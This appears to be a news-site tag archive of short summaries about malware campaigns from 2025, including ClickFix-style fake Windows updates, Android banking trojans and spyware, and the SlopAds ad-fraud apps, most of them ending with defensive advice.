obfuscation techniques Archives

Tech Optimizer

December 3, 2025

Wacatac Trojan: What Is It And How To Remove It

The Wacatac Trojan is a type of malware first documented in January 2020, known for disguising itself as benign software to trick users into installation. It operates under various aliases, including Trojan:Script/Wacatac and Trojan:Win32/Wacatac, and can connect to Command-and-Control (C2) servers for remote manipulation. Its capabilities include stealing credentials, evading antivirus detection, creating or joining botnets, causing system damage, enabling spyware functions, acting as Remote Access Tools (RATs), and downloading additional malware. Symptoms of infection include sluggish performance, program failures, unexplained storage reductions, and unfamiliar processes. Wacatac spreads through unofficial software, malicious web pages, and phishing emails. Removal is best achieved using reputable antivirus software, while prevention involves avoiding questionable downloads, practicing good digital hygiene, keeping software updated, backing up data, and using quality antivirus solutions. False positives can occur, where legitimate programs are mistakenly flagged as Wacatac.

Winsage

November 25, 2025

JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

Cybersecurity experts have identified a new campaign that combines ClickFix tactics with counterfeit adult websites to trick users into executing harmful commands under the guise of a "critical" Windows security update. This campaign uses fake adult sites, including clones of popular platforms, as phishing mechanisms, increasing psychological pressure on victims. ClickFix-style attacks have risen significantly, accounting for 47% of all attacks, according to Microsoft data. The campaign features convincing fake Windows update screens that take over the user's screen and instruct them to execute commands that initiate malware infections. The attack begins when users are redirected to a fake adult site, where they encounter an "urgent security update." The counterfeit Windows Update screen is created using HTML and JavaScript, and it attempts to prevent users from escaping the alert. The initial command executed is an MSHTA payload that retrieves a PowerShell script from a remote server, which is designed to deliver multiple payloads, including various types of malware. The downloaded PowerShell script employs obfuscation techniques and seeks to elevate privileges, potentially allowing attackers to deploy remote access trojans (RATs) that connect to command-and-control servers. The campaign has been linked to other malware execution chains that also utilize ClickFix lures. Security researchers recommend enhancing defenses through employee training and disabling the Windows Run box to mitigate risks associated with these attacks.

AppWizard

October 30, 2025

More Than 700 Malicious Android Apps Using NFC Relay to Exfiltrate Banking Credentials

Cybersecurity researchers at zLabs have identified over 760 malicious Android applications that exploit Near Field Communication (NFC) and Host Card Emulation (HCE) technologies to steal payment data and facilitate fraudulent transactions. Since April 2024, these applications have evolved into a coordinated global operation targeting financial institutions in countries such as Russia, Poland, the Czech Republic, Slovakia, and Brazil. The threat actors have established around 70 command-and-control servers and use Telegram bots for data exfiltration. The malicious apps impersonate about 20 legitimate entities, focusing on Russian banks and international institutions like Santander and Google Pay. They utilize various strategies to compromise payment credentials, including scanner and tapper tools, and employ simplified interfaces resembling legitimate banking portals. The malware activates a Host Card Emulation service during NFC payment events for real-time data relay. To evade detection, the threat actors use name masquerading, code obfuscation, and software packing techniques. This campaign represents a significant escalation in NFC-based financial fraud, highlighting the risks associated with NFC payment privileges.

AppWizard

October 15, 2025

GhostBat RAT Android Malware Poses as Fake RTO Apps to Steal Banking Data from Indian Users

The GhostBat RAT campaign employs sophisticated malware distribution techniques, utilizing infection vectors such as WhatsApp, SMS with shortened URLs, GitHub-hosted APKs, and compromised websites to deliver malicious Android droppers. These droppers utilize multi-stage workflows, ZIP header manipulation, and string obfuscation to evade detection. The malware includes tools for stealing banking credentials and cryptocurrency miners, directing victims to phishing pages resembling the mParivahan app to collect sensitive information. SMS messages with banking keywords are exfiltrated to command and control servers, while incoming messages may be forwarded for OTP harvesting. Device registration occurs through a Telegram bot named GhostBatRat_bot. In July 2024, Android malware impersonating Regional Transport Office applications was documented, designed to steal contacts and SMS messages. Observations from September 2025 revealed over forty samples propagating through WhatsApp and SMS, ultimately delivering a malicious version of the mParivahan app. The malware initiates phishing activities by requesting SMS permissions and harvesting banking credentials. VirusTotal detections for the malware remain low due to its multi-layered dropper mechanisms and obfuscation techniques. The architecture of GhostBat RAT features multi-stage dropper workflows, native binary packing, and heavy string obfuscation. The first-stage dropper verifies device architecture and manufacturer, while subsequent stages decrypt and execute payloads, including a cryptominer library and a malicious APK for data theft. Victims encounter a counterfeit Google Play update page, leading to the installation of the malicious APK, which requests SMS permissions and presents a phishing interface. Users are prompted to enter their UPI PIN into a fake payment flow, which forwards the PIN to a Firebase endpoint. The campaign highlights the need for careful SMS permission management and vigilance against shortened URLs to combat emerging Android malware threats.

AppWizard

October 10, 2025

Fake WhatsApp and TikTok apps are trying to fool Android users into downloading spyware — don’t fall for this

A spyware campaign is disguising itself as popular applications like TikTok, YouTube, and WhatsApp to lure users into downloading the ClayRat spyware. This campaign uses Telegram channels for distribution and employs fake download counts and testimonials on malicious websites. Discovered by Zimperium, the spyware requires users to set it as their default SMS application, allowing it to access sensitive information and spread further. The campaign is primarily targeting Russian users, with at least 600 samples and 50 droppers detected in the last 90 days. The malware uses obfuscation techniques to evade detection. Android users with Google Play Protect have some protection, but best practices for online safety are recommended, such as using reputable app sources and avoiding suspicious links.

AppWizard

October 9, 2025

New ClayRat Spyware Targets Android Users via Fake WhatsApp and TikTok Apps

A sophisticated Android spyware campaign called ClayRat is targeting users in Russia through Telegram channels and deceptive phishing websites that mimic popular applications like WhatsApp and TikTok. Once activated, ClayRat can exfiltrate sensitive data such as SMS messages and call logs, access device information, take photos, and send messages or make calls from the victim's device. It propagates by sending malicious links to all contacts in the victim's phone book. Over the past 90 days, Zimperium has identified over 600 samples and 50 droppers of ClayRat, which uses advanced obfuscation techniques to evade detection. The malware redirects users to fraudulent websites leading to Telegram channels, where they are lured into downloading APK files. Some samples function as droppers, displaying counterfeit Play Store update screens while concealing the actual payload. Once installed, ClayRat communicates with its command-and-control infrastructure and can capture sensitive content, making infected devices automated distribution nodes. Additionally, a study by researchers from the University of Luxembourg and Université Cheikh Anta Diop found that pre-installed applications on budget Android smartphones sold in Africa operate with elevated privileges, with 9% disclosing sensitive data and 16% exposing critical components without safeguards.

Tech Optimizer

October 8, 2025

New Fully Undetectable FUD Android RAT Hosted on GitHub

A sophisticated Android remote access trojan (RAT) has been discovered on GitHub, named "Android-RAT," created by the user Huckel789. This malware is fully undetectable (FUD) and can bypass modern security measures and antivirus systems. It operates through a web-based interface without requiring installation on a PC, making it accessible to users with varying technical skills. The RAT exploits GitHub's trusted platform status to evade security filters and includes features such as keylogging, credential hijacking, ransomware functionality, and social engineering tools. The malware employs advanced stealth techniques to avoid detection by antivirus solutions and VirusTotal scans, integrating anti-emulator and virtual machine detection mechanisms. It can persist through battery optimization modes and power management restrictions, particularly in Chinese ROMs like MIUI, while consuming minimal system resources. The RAT's communication infrastructure uses AES-128-CBC encryption for secure data transmissions, complicating network traffic analysis. Its "Freeze Mode" limits data transmission to 1-3MB over 24 hours, reducing the likelihood of detection. Additionally, the malware can inject its payload into legitimate applications via a dropper module, making initial infection vectors difficult to identify.

AppWizard

September 24, 2025

Banking Trojans Targeting Android Users Disguise as Government and Trusted Payment Apps

Since August 2024, a financially motivated threat group has targeted Android users in Indonesia and Vietnam by deploying banking trojans disguised as legitimate government identity and payment applications. The campaign utilizes intricate download mechanisms, reuses existing infrastructure, and employs template-based spoofed sites to evade detection while stealing user credentials. Researchers identified the campaign through suspicious HTML elements on counterfeit Google Play Store pages, with notable domains like icrossingappxyz[.]com featuring deceptive download buttons. The download process involved a WebSocket connection that streamed the .apk file in chunks, effectively bypassing network security filters. The downloaded file, often named IdentitasKependudukanDigital.apk, contained a variant of the BankBot.Remo trojan. Additionally, simpler spoofed sites imitated popular regional applications, such as a clone of the M-Pajak tax-payment app hosted on twmlwcs[.]cc, which was also identified as a BankBot loader. Other variants were found on domains like dgpyynxzb[.]com and ykkadm[.]icu, masquerading as legitimate banking applications. Over the past year, researchers identified over 100 domains associated with this campaign, primarily utilizing Alibaba ISP and registered through Gname.com Pte. Ltd. The operational patterns revealed a focus on Indonesian and Vietnamese victims, with domain registration and DNS queries peaking during Eastern Asia daytime hours. The campaign combines advanced obfuscation techniques with mass-template spoofing to circumvent security controls, highlighting the need for user vigilance and monitoring of unusual WebSocket traffic.

AppWizard

September 17, 2025

224 Malicious Android Apps on Google Play With 38 Million Downloads Delivering Malicious Payloads

A mobile ad fraud operation called "SlopAds" infiltrated the Google Play Store with 224 malicious applications, which collectively achieved over 38 million downloads across 228 countries. The operation utilized advanced steganography and obfuscation techniques to deliver fraudulent advertising payloads while avoiding detection. SlopAds activated its fraud system selectively based on specific advertising campaigns, generating around 2.3 billion fraudulent bid requests daily, primarily from the United States (30%), India (10%), and Brazil (7%). The malicious apps exploited Firebase Remote Config to retrieve encrypted data for downloading a primary fraud module named "FatModule." This module was concealed within PNG image files, allowing it to bypass traditional security measures. The FatModule included anti-analysis features to evade detection by security researchers. Google has since removed all identified SlopAds applications from the Play Store and implemented protections through Google Play Protect.

AppWizard

September 17, 2025

Google just took down 224 malicious apps with 38 million installs from the Play Store — how to stay safe

224 malicious applications have been removed from the Google Play Store due to a significant ad fraud operation named "SlopAds," which amassed over 38 million downloads. The campaign spanned 228 countries, with the highest ad impressions from the United States (30%), India (10%), and Brazil (7%). The apps used sophisticated obfuscation techniques to evade Google’s security measures. Users are advised to uninstall these harmful applications, as they can negatively impact device performance by causing excessive data consumption and battery strain. Users who sideload apps from unofficial sources are particularly vulnerable to such threats. Security experts anticipate that similar ad fraud operations may occur in the future.